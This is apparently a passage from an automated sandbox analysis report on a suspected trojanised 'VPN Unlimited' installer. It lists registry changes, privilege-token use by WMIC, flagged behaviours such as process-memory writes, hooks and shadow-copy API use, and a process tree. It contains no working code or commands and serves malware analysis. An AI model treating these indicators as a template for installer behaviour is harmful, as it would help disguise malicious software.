| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\88AAB0B9F51EF1A3CA0C2B609EDD7FC1\27DD5200959A5B540A3AE7EF1BA50805 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v14 | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14 | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\88AAB0B9F51EF1A3CA0C2B609EDD7FC1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\ProductName = "Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\Version = "237272852" | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.30,bundle | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell\open | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14\ = "{D5D19E2F-7189-42FE-8103-92CD1FA457C2}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.36,bundle\Version = "14.36.32532.0" | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8800A266DCF6DD54E97A86760485EA5D\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F2E91D5D9817EF24183029DCF14A752C\VC_Runtime_Minimum | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v14\ = "{0025DD72-A959-45B5-A0A3-7EFEB15A8050}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\SourceList\Net\1 = "C:\\ProgramData\\Package Cache\\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532\\packages\\vcRuntimeAdditional_amd64\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.36,bundle\ = "{8bdfe669-9705-4184-9368-db9ce581e0e7}" | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\SourceList\PackageName = "vc_runtimeMinimum_x64.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\\packages\\vcRuntimeMinimum_amd64\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14\Dependents\{8bdfe669-9705-4184-9368-db9ce581e0e7} | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\INSTALLER\DEPENDENCIES\MICROSOFT.VS.VC_RUNTIMEMINIMUMVSU_AMD64,V14\DEPENDENTS\{57A73DF6-4BA9-4C1D-BBBB-517289FF6C13} | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8A567BD6FA501A947AD1F646E53EEC14\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v14 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell\open\command\ = "\"C:\\Program Files (x86)\\VPN Unlimited\\vpn-unlimited-launcher.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.36,bundle\Dependents | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\ProductName = "Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\Version = "237272852" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.30,bundle\Dependents | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v14\Version = "14.36.32532" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\27DD5200959A5B540A3AE7EF1BA50805\VC_Runtime_Additional | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8800A266DCF6DD54E97A86760485EA5D\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\09A86F63C932FD435BC8463B1035EC53 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F2E91D5D9817EF24183029DCF14A752C\Provider | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\27DD5200959A5B540A3AE7EF1BA50805\Servicing_Key | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532\\packages\\vcRuntimeAdditional_amd64\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F2E91D5D9817EF24183029DCF14A752C | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F2E91D5D9817EF24183029DCF14A752C\Servicing_Key | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.36,bundle\DisplayName = "Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532" | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\INSTALLER\DEPENDENCIES\MICROSOFT.VS.VC_RUNTIMEADDITIONALVSU_AMD64,V14\DEPENDENTS\{57A73DF6-4BA9-4C1D-BBBB-517289FF6C13} | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\URL Protocol | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8800A266DCF6DD54E97A86760485EA5D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8800A266DCF6DD54E97A86760485EA5D | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\09A86F63C932FD435BC8463B1035EC53 | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install(4).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited.exe
"C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited.exe"
C:\Users\Admin\AppData\Local\Temp\jgt.exe
"C:\Users\Admin\AppData\Local\Temp\jgt.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Users\Admin\AppData\Local\Temp\Install(4).exe
"C:\Users\Admin\AppData\Local\Temp\Install(4).exe"
C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe
"C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe"
C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp
